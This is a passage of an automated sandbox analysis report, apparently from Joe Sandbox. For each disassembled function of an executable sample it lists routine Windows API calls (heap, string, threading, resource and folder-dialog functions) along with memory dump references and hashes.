                                      • wcsncmp.MSVCRT ref: 00405853
                                      • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,?,?,-0000012C,?,?,004022A6,00000000,00000002,00000000,00000000,00417024), ref: 004058E1
                                      • wcsncpy.MSVCRT ref: 004058F9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: memmovewcsncmpwcsncpy
                                      • String ID: $0A$$0A
                                      • API String ID: 1452150355-167650565
                                      • Opcode ID: d76f75147769cfeda3015acce6fec10c4d54059df292c5d7079ca0585360228a
                                      • Instruction ID: fc6078814c183f32d07ee1b1bbfb59dc2b99a9263d9aed9d6ca5449e395b5937
                                      • Opcode Fuzzy Hash: d76f75147769cfeda3015acce6fec10c4d54059df292c5d7079ca0585360228a
                                      • Instruction Fuzzy Hash: 4C31D536904B058BC720FF55888057B77A8EE84344F14893EEC85373C2EB799D61DBAA
                                      Function 00405553 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 00405562
                                      • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,00000000), ref: 00405571
                                      • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00405581
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: AddressHandleModuleProcmemset
                                      • String ID: RtlGetVersion$ntdll.dll
                                      • API String ID: 3137504439-1489217083
                                      • Opcode ID: 6332086022332b991d2c4cf9c539ad8fbd8ac088d8322b57d3057784f2e87649
                                      • Instruction ID: 30d66d9a54b09ec8b40df40bafdfba1d8cbaec4fc0a5d0b23e6a41b72964e000
                                      • Opcode Fuzzy Hash: 6332086022332b991d2c4cf9c539ad8fbd8ac088d8322b57d3057784f2e87649
                                      • Instruction Fuzzy Hash: FAE09A3176461176C6202B76AC09FCB2AACDF8AB01B14043AB105E21C5E63C8A018ABD
                                      Function 0040A043 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 80memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • wcslen.MSVCRT ref: 0040A0AB
                                      • HeapAlloc.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00000000,00409ECC,?,?,00000000,?,?,00403C62), ref: 0040A0C1
                                      • wcscpy.MSVCRT ref: 0040A0CC
                                      • memset.MSVCRT ref: 0040A0FA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: AllocHeapmemsetwcscpywcslen
                                      • String ID: $0A
                                      • API String ID: 1807340688-513306843
                                      • Opcode ID: ddb17ac4584ae50943752de31405e04708b8483d2d19b8b99954ed05a6fee5b2
                                      • Instruction ID: f5e08f91bfd61cb5ee80f18050d08b7446549b79f9f251a776f81db7a0f8ced7
                                      • Opcode Fuzzy Hash: ddb17ac4584ae50943752de31405e04708b8483d2d19b8b99954ed05a6fee5b2
                                      • Instruction Fuzzy Hash: ED212431100B04AFC321AF259845B2BB7F9EF88314F14453FFA8562692DB39A8158B1A
                                      Function 00409DE0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 73memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00409ECF: HeapFree.KERNEL32(00000000,?,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000), ref: 00409EFA
                                        • Part of subcall function 00409ECF: HeapFree.KERNEL32(00000000,?,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409F06
                                        • Part of subcall function 00409ECF: HeapFree.KERNEL32(00000000,?,?,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 00409F1A
                                        • Part of subcall function 00409ECF: HeapFree.KERNEL32(00000000,00000000,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409F30
                                      • HeapAlloc.KERNEL32(00000000,0000003C,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409DFF
                                      • HeapAlloc.KERNEL32(00000008,00000015,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409E25
                                      • HeapAlloc.KERNEL32(00000008,FFFFFFED,FFFFFFED,00000010,00010000,00000004,00000200,?,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 00409E82
                                      • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409E9C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: Heap$Free$Alloc
                                      • String ID: $0A
                                      • API String ID: 3901518246-513306843
                                      • Opcode ID: b46946705b204f9c30dffdadfffedc2aca485d526b87e64f112108196cd3b2d8
                                      • Instruction ID: e0ba865afb0c504cde721ebe6402ca52a8b9bc1920db32d4218675ac1f34fbd8
                                      • Opcode Fuzzy Hash: b46946705b204f9c30dffdadfffedc2aca485d526b87e64f112108196cd3b2d8
                                      • Instruction Fuzzy Hash: EC213971600616ABD320DF2ADC01B46BBE9BF88710F41852AB548A76A1DB71EC248BD8
                                      Function 00405492 Relevance: 7.6, APIs: 5, Instructions: 60synchronizationthreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateThread.KERNEL32(00000000,00001000,?,?,00000000,008C8F58), ref: 004054AB
                                      • EnterCriticalSection.KERNEL32(004186A8,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054BD
                                      • WaitForSingleObject.KERNEL32(00000008,00000000,00000000,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000), ref: 004054D4
                                      • CloseHandle.KERNEL32(00000008,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054E0
                                        • Part of subcall function 0040DB32: HeapFree.KERNEL32(00000000,-00000008,0040D44B,00000010,00000800,?,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?), ref: 0040DB6B
                                      • LeaveCriticalSection.KERNEL32(004186A8,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 00405523
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: CriticalSection$CloseCreateEnterFreeHandleHeapLeaveObjectSingleThreadWait
                                      • String ID:
                                      • API String ID: 3708593966-0
                                      • Opcode ID: 90d5c19b946ffb749f21a3af15512962dae866b54bf80da6b69c9a1821aaad17
                                      • Instruction ID: 0c8983fff82f944e714e95dc609c427016460782395ad7ea9b381996daa8850a
                                      • Opcode Fuzzy Hash: 90d5c19b946ffb749f21a3af15512962dae866b54bf80da6b69c9a1821aaad17
                                      • Instruction Fuzzy Hash: 6E110632145604BFC3015F54EC05ED7BBB9EF45752721846BF800972A0EB75A8508F6D
                                      Function 0040D946 Relevance: 7.6, APIs: 5, Instructions: 54memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • EnterCriticalSection.KERNEL32(00418624,00000200,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3), ref: 0040D95A
                                      • LeaveCriticalSection.KERNEL32(00418624,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040D9AF
                                        • Part of subcall function 0040D946: HeapFree.KERNEL32(00000000,?,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004), ref: 0040D9A8
                                      • DeleteCriticalSection.KERNEL32(00000020,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3), ref: 0040D9C8
                                      • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200), ref: 0040D9D7
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: CriticalSection$FreeHeap$DeleteEnterLeave
                                      • String ID:
                                      • API String ID: 3171405041-0
                                      • Opcode ID: cbed9a95af3197c0c236be5f183e3b734408b447f4af695c0c167132bfd4a986
                                      • Instruction ID: 8e0b58a532cd0764c064264ab0afec864f9344a56e81b99afb7742a3bcd9c4dc
                                      • Opcode Fuzzy Hash: cbed9a95af3197c0c236be5f183e3b734408b447f4af695c0c167132bfd4a986
                                      • Instruction Fuzzy Hash: 80112B71501601AFC7209F55DC48B96BBB5FF49311F10843EA45A936A1D738A844CF98
                                      Function 00409698 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0040E260: TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E26C
                                        • Part of subcall function 0040E260: HeapReAlloc.KERNEL32(008C0000,00000000,?,?), ref: 0040E2C7
                                      • GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 004096B4
                                      • wcscmp.MSVCRT ref: 004096C2
                                      • memmove.MSVCRT(00000000,00000008,\\?\,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000), ref: 004096DA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: AllocFileHeapModuleNameValuememmovewcscmp
                                      • String ID: \\?\
                                      • API String ID: 3734239354-4282027825
                                      • Opcode ID: 0153655e129c1090b4fb96721347d81aa5438cd66e58ba985cbb1c9c08f4e59e
                                      • Instruction ID: 273bc576c06434c2caee33e7ea90b93358419674725e30c46c8a7bea9ec705d9
                                      • Opcode Fuzzy Hash: 0153655e129c1090b4fb96721347d81aa5438cd66e58ba985cbb1c9c08f4e59e
                                      • Instruction Fuzzy Hash: BBF0E2B31006017BC210677BDC85CAB7EACEB853747000A3FF515D24D2EA38D82496B8
                                      Function 0040B236 Relevance: 6.3, APIs: 5, Instructions: 93COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 0040B2D7
                                      • memset.MSVCRT ref: 0040B2E0
                                      • memset.MSVCRT ref: 0040B2E9
                                      • memset.MSVCRT ref: 0040B2F6
                                      • memset.MSVCRT ref: 0040B302
                                        • Part of subcall function 0040C636: memcpy.MSVCRT(?,?,00000040,?,?,?,?,?,?,?,?,?,00000000,?,0040B275,?), ref: 0040C690
                                        • Part of subcall function 0040C636: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,0040B275,?), ref: 0040C6DF
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: memset$memcpy
                                      • String ID:
                                      • API String ID: 368790112-0
                                      • Opcode ID: 6af7cb9f910f70f93df9e3bab83db51edc5e588b158ebd52074512bae1687c56
                                      • Instruction ID: 0935afcf37e6329c3ac2d0f56793f6a9f9fc9668031c2f15978d8007e640a3dc
                                      • Opcode Fuzzy Hash: 6af7cb9f910f70f93df9e3bab83db51edc5e588b158ebd52074512bae1687c56
                                      • Instruction Fuzzy Hash: 322103317506083BE524AA29DC86F9F738CDB81708F40063EF241BA2C1CA79E54947AE
                                      Function 00405BA0 Relevance: 6.2, APIs: 4, Instructions: 167memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: AllocHeapwcsncpy
                                      • String ID:
                                      • API String ID: 2304708654-0
                                      • Opcode ID: abff55b24cf8305edd91d71e69c9c0649d4e3fc2b61a87c9063bbd8ae977bd8a
                                      • Instruction ID: a3f43ae3cc8438659badc3904afd778ac5f48c872593279c616423bb3bd2bb8e
                                      • Opcode Fuzzy Hash: abff55b24cf8305edd91d71e69c9c0649d4e3fc2b61a87c9063bbd8ae977bd8a
                                      • Instruction Fuzzy Hash: 6D51AD34508B059BDB209F28D844A6B77F4FF84348F544A2EF885A72D0E778E915CB99
                                      Function 00406670 Relevance: 6.1, APIs: 4, Instructions: 90COMMON
                                      Download Yara Rule
                                      APIs
                                      • CharLowerW.USER32(00417032,?,?,?,?,?,?,?,?,?,00402745,00000000,00000000), ref: 00406696
                                      • CharLowerW.USER32(00000000,?,?,?,?,?,?,?,?,00402745,00000000,00000000), ref: 004066D0
                                      • CharLowerW.USER32(?,?,?,?,?,?,?,?,?,00402745,00000000,00000000), ref: 004066FF
                                      • CharLowerW.USER32(?,?,?,?,?,?,?,?,?,00402745,00000000,00000000), ref: 00406705
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: CharLower
                                      • String ID:
                                      • API String ID: 1615517891-0
                                      • Opcode ID: e161e10b7a4b34b45bc7c15099726f4e7ff8b3d71e89e60b0d1392e1659b6289
                                      • Instruction ID: 50cff0fc212774e4e1f85142edc8b720228546f3e888a8e5f893537154114361
                                      • Opcode Fuzzy Hash: e161e10b7a4b34b45bc7c15099726f4e7ff8b3d71e89e60b0d1392e1659b6289
                                      • Instruction Fuzzy Hash: 582176796043058BC710AF1D9C40077B7E4EB80364F86483BEC85A3380D639EE169BA9
                                      Function 00412240 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                      Download Yara Rule
                                      APIs
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00412271
                                      • malloc.MSVCRT ref: 00412281
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041229B
                                      • malloc.MSVCRT ref: 004122B0
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWidemalloc
                                      • String ID:
                                      • API String ID: 2735977093-0
                                      • Opcode ID: dda470ae4ce4e8229e703b02ef989f91deb9167292a565bef41a6c3ba200bf59
                                      • Instruction ID: 3c1085fe75aa08d7dfcf325d5fd6ce3d1ff6e0efa089dc1519f7c1eb2db8e9d3
                                      • Opcode Fuzzy Hash: dda470ae4ce4e8229e703b02ef989f91deb9167292a565bef41a6c3ba200bf59
                                      • Instruction Fuzzy Hash: F70145373413013BE2204685AC02FAB3B58CBC1B95F1900BAFF04AE6C0C6F3A80182B8
                                      Function 004121A0 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                      Download Yara Rule
                                      APIs
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0040D0B8,00000000), ref: 004121D4
                                      • malloc.MSVCRT ref: 004121E4
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000), ref: 00412201
                                      • malloc.MSVCRT ref: 00412216
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWidemalloc
                                      • String ID:
                                      • API String ID: 2735977093-0
                                      • Opcode ID: 00a490c9ef2dc5a478e4fad7c5361c88d21327c35d3ed7742fb63e43f6d77948
                                      • Instruction ID: ba92e613a2f9bf0a88025da3432e472bc54701246ba04d0c993b0b67be8a7a27
                                      • Opcode Fuzzy Hash: 00a490c9ef2dc5a478e4fad7c5361c88d21327c35d3ed7742fb63e43f6d77948
                                      • Instruction Fuzzy Hash: 9401F57B38130137E3205695AC42FBB7B59CB81B95F1900BAFB05AE2C1D6F76814C6B9
                                      Function 00405436 Relevance: 6.0, APIs: 4, Instructions: 34threadCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004053EA: EnterCriticalSection.KERNEL32(004186A8,?,?,-0000012C,004053D0,00000000,00401FC5,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000), ref: 004053F5
                                        • Part of subcall function 004053EA: LeaveCriticalSection.KERNEL32(004186A8,?,?,-0000012C,004053D0,00000000,00401FC5,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000), ref: 00405428
                                      • TerminateThread.KERNEL32(00000000,00000000,00000000,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000), ref: 00405446
                                      • EnterCriticalSection.KERNEL32(004186A8,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405452
                                      • CloseHandle.KERNEL32(-00000008,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405472
                                        • Part of subcall function 0040DB32: HeapFree.KERNEL32(00000000,-00000008,0040D44B,00000010,00000800,?,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?), ref: 0040DB6B
                                      • LeaveCriticalSection.KERNEL32(004186A8,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405486
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: CriticalSection$EnterLeave$CloseFreeHandleHeapTerminateThread
                                      • String ID:
                                      • API String ID: 85618057-0
                                      • Opcode ID: a2b12058037983e8feb28cac182eb15ba2e3b37f6182c0419abf98dc8b579576
                                      • Instruction ID: 3069acd899a723a1849542c16efb52ddeba99d38bb4cb8d15d413c759c742d3e
                                      • Opcode Fuzzy Hash: a2b12058037983e8feb28cac182eb15ba2e3b37f6182c0419abf98dc8b579576
                                      • Instruction Fuzzy Hash: CDF05432905610AFC2205F619C48AE77B79EF54767715843FF94573190D73868408E6E
                                      Function 00403001 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 193COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0040DFC0: TlsGetValue.KERNEL32(0000000D,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,00417070,00000008,0000000C), ref: 0040DFD7
                                        • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                        • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                        • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                        • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                                        • Part of subcall function 00405EB0: CharUpperW.USER32(00000000,00000000,FFFFFFF5,00001000,00001000,?,?,00001000,00402FE6,00000000,00000008,00000001,00000000,00000000,00000000,00000000), ref: 00405F01
                                        • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                        • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(008C0000,00000000,?), ref: 0040DEF9
                                        • Part of subcall function 0040DEC0: RtlReAllocateHeap.NTDLL(008C0000,00000000,?,?), ref: 0040DF1C
                                        • Part of subcall function 00402E9D: FindResourceW.KERNEL32(00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000,00000000,00000000,00000001,00000000,00000000,00000000), ref: 00402EC5
                                        • Part of subcall function 00402E9D: __fprintf_l.LIBCMT ref: 00402F1F
                                        • Part of subcall function 00409355: CoInitialize.OLE32(00000000), ref: 00409373
                                        • Part of subcall function 00409355: memset.MSVCRT ref: 00409381
                                        • Part of subcall function 00409355: LoadLibraryW.KERNEL32(SHELL32.DLL,?,?,0000000A), ref: 0040938E
                                        • Part of subcall function 00409355: GetProcAddress.KERNEL32(00000000,SHBrowseForFolderW), ref: 004093B0
                                        • Part of subcall function 00409355: GetProcAddress.KERNEL32(00000000,SHGetPathFromIDListW), ref: 004093BC
                                        • Part of subcall function 00409355: wcsncpy.MSVCRT ref: 004093DD
                                        • Part of subcall function 00409355: wcslen.MSVCRT ref: 004093F1
                                        • Part of subcall function 00409355: CoTaskMemFree.OLE32(?), ref: 0040947A
                                        • Part of subcall function 00409355: wcslen.MSVCRT ref: 00409481
                                        • Part of subcall function 00409355: FreeLibrary.KERNEL32(00000000,00000000), ref: 004094A0
                                        • Part of subcall function 00403CD7: FindResourceW.KERNEL32(00000000,0000000A,00000000,00000000,00000000,00000000,00000000,-00000004,00403A61,00000000,00000001,00000000,00000000,00000001,00000003,00000000), ref: 00403D07
                                      • PathAddBackslashW.SHLWAPI(00000000,00000200,FFFFFFF5,00000000,00000000,00000000,00000200,00000000,00000000,FFFFFFF5,00000003,00000000,00000000,00000000,00000000,00000000), ref: 004031CC
                                        • Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037
                                      • PathRemoveBackslashW.SHLWAPI(00000000,00000000,00000000,008C7CE0,00000000,00000000,00000200,00000000,00000000,00000200,FFFFFFF5,00000000,00000000,00000000,00000200,00000000), ref: 00403231
                                        • Part of subcall function 00402CA9: FindResourceW.KERNEL32(?,0000000A,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402D44
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
